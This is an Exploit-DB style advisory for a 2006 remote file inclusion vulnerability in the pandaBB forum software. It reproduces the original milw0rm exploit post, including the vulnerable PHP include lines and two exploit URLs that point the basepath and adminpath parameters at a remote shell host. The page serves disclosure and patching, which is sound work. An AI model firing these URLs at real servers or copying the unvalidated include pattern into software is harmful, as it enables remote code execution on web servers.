pandaBB (basepath;adminpath) Remote File Include

vendor:

pandaBB

by:

nukedclx (nukedclx@gmail.com)

7,5

CVSS

HIGH

Remote File Include

CWE

Product Name: pandaBB

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

pandaBB (basepath;adminpath) Remote File Include

A remote file include vulnerability exists in pandaBB, which allows an attacker to include a remote file containing malicious PHP code resulting in arbitrary code execution. This is due to the application including files based on user input without proper validation. An attacker can leverage this vulnerability to execute arbitrary PHP code under the context of the web server process.

Mitigation:

Input validation should be used to ensure that user supplied input is properly sanitized and is not used to include files from external sources.

Source

Exploit-DB raw data:

:::::::::  :::::::::: :::     ::: ::::::::::: :::
:+:    :+: :+:        :+:     :+:     :+:     :+:
+:+    +:+ +:+        +:+     +:+     +:+     +:+
+#+    +:+ +#++:++#   +#+     +:+     +#+     +#+
+#+    +#+ +#+         +#+   +#+      +#+     +#+
#+#    #+# #+#          #+#+#+#       #+#     #+#
#########  ##########     ###     ########### ##########

::::::::::: ::::::::::     :::     ::::    ::::
    :+:     :+:          :+: :+:   +:+:+: :+:+:+
    +:+     +:+         +:+   +:+  +:+ +:+:+ +:+
    +#+     +#++:++#   +#++:++#++: +#+  +:+  +#+
    +#+     +#+        +#+     +#+ +#+       +#+
    #+#     #+#        #+#     #+# #+#       #+#
    ###     ########## ###     ### ###       ###

   - - [DEVIL TEAM THE BEST POLISH TEAM] - -

pandaBB (basepath;adminpath) Remote File Include
[Script name: pandaBB
[Script site: http://phpnuke.pl
Find by: nukedclx (nukedclx@gmail.com)

DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam
Contact:
- kacper1964@yahoo.pl
- http://www.rahim.webd.pl/
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Greetings DragonHeart and all DEVIL TEAM Patriots :)
- Leito & Leon & Kacper
TomZen, Gelo, Ramzes, DMX, Ci2u, Larry, @steriod, Drzewko., CrazzyIwan, Rammstein
Adam., Kicaj., DeathSpeed, Arkadius, Michas, pepi, SkD, MXZ, sysios, mIvus, wacky


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
in modules/My_eGallery/public/displayCategory.php

lines 1-3:
<?php
include ("$basepath/public/imageFunctions.php");
include ("$adminpath/fileFunctions.php");

%Exploit
        http://host/pandadir/modules/My_eGallery/public/displayCategory.php?adminpath=http://sh3ll
        http://host/pandadir/modules/My_eGallery/public/displayCategory.php?basepath=http://sh3ll

# milw0rm.com [2006-10-19]